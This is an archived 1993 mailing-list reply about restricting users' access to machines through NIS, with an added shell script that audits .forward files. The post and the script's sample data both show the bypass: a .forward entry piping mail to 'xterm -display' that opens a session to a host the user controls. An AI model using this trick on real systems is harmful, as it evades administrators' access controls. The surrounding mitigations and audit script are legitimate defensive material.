Re: Summary of How to disallow selected users access to selected machines

From: Rob Quinn (rjq@phys.ksu.edu)
Date: Fri Apr 16 1993 - 10:41:51 CDT


In <1qm4neINNlr3@sbusol.rz.uni-sb.de> et11ltab@sbusol.rz.uni-sb.de (Alexander Bachmann) writes:
>+@restricted-group:*:0:0:::/usr/local/sh/no-access
>+::0:0:::
>We don't remove the NIS passwd entries for users with -user
>(or -@netgroup) because this will cause trouble with email, when a
>user is not known on the mail-server.

 I have successfully broken into (my own) machines this way. Create a .forward
with something like '|xterm -display machine_I_can_use:0' in it and then send
yourself some mail. With NFS disks, it's easy to create .forwards on other
machines.
 If you do go with the '-@netgroup' option, make sure local mail sent out has
full hostnames so that when a user on a restricted machine replies to mail from
a restricted user it won't be a local delivery to the restricted machine. Or
use a central mailhost/MX stuff and deliver all mail on one machine only.
(Did that make sense?)

--
| "Those who suppress freedom always                             Rob Quinn |
| do so in the name of law                                rjq@phys.ksu.edu |
| and order." --John Lindsay                         QuinnBob@KSUVM.BITNET |
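
An audit for the .forward problem described in the message above, added here as an example and not part of the original post. It reads passwd(5)-format lines on stdin and reports accounts whose shell is the no-access shell from the quoted entry but whose .forward pipes mail to a program. The function names, sample accounts and sample paths are constructed for illustration.

```shell
#!/bin/sh
# Added example: list accounts whose shell is the no-access shell but whose
# .forward pipes mail to a program. Input: passwd(5) lines on stdin.
RESTRICTED_SHELL="/usr/local/sh/no-access"   # shell from the quoted passwd entry

# audit_forwards [ROOT]  (hypothetical helper; ROOT is prefixed to each home dir)
# Prints one "user:file:entry" line per piped entry.
audit_forwards() {
    root="${1:-}"
    while IFS=: read -r user _pw _uid _gid _gecos home shell; do
        [ "$shell" = "$RESTRICTED_SHELL" ] || continue
        fwd="$root$home/.forward"
        [ -f "$fwd" ] || continue
        # Entries are comma- or newline-separated; one that starts with "|"
        # (optionally inside quotes) is handed to a program by the mailer.
        tr ',' '\n' < "$fwd" | sed 's/^[[:space:]]*//' |
            grep -E '^["'\'']?\|' |
            while IFS= read -r entry; do
                printf '%s:%s:%s\n' "$user" "$fwd" "$entry"
            done
    done
}

# Constructed sample data (not from the original post).
SAMPLE_PASSWD='alice:*:1001:100::/home/alice:/usr/local/sh/no-access
bob:*:1002:100::/home/bob:/usr/local/sh/no-access
carol:*:1003:100::/home/carol:/usr/local/sh/no-access
dave:*:1004:100::/home/dave:/bin/sh'

make_sample() {   # build constructed home directories under "$1"
    mkdir -p "$1/home/alice" "$1/home/bob" "$1/home/carol" "$1/home/dave"
    printf '%s\n' '"|xterm -display machine_I_can_use:0"' > "$1/home/alice/.forward"
    printf '%s\n' 'bob@mailhost.example' > "$1/home/bob/.forward"
    printf '%s\n' '\carol, "|/usr/local/bin/filter"' > "$1/home/carol/.forward"
    printf '%s\n' '|/usr/local/bin/filter' > "$1/home/dave/.forward"
}

demo() {
    tmp=$(mktemp -d) || return 1
    make_sample "$tmp"
    printf '%s\n' "$SAMPLE_PASSWD" | audit_forwards "$tmp"   # flags alice and carol
    rm -rf "$tmp"
}
demo
```

On a live system, drop the `demo` call and feed the function the resolved account list on the host where the home directories are mounted, for example `getent passwd | audit_forwards`.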



This archive was generated by hypermail 2.1.2 : Fri Sep 28 2001 - 23:07:45 CDT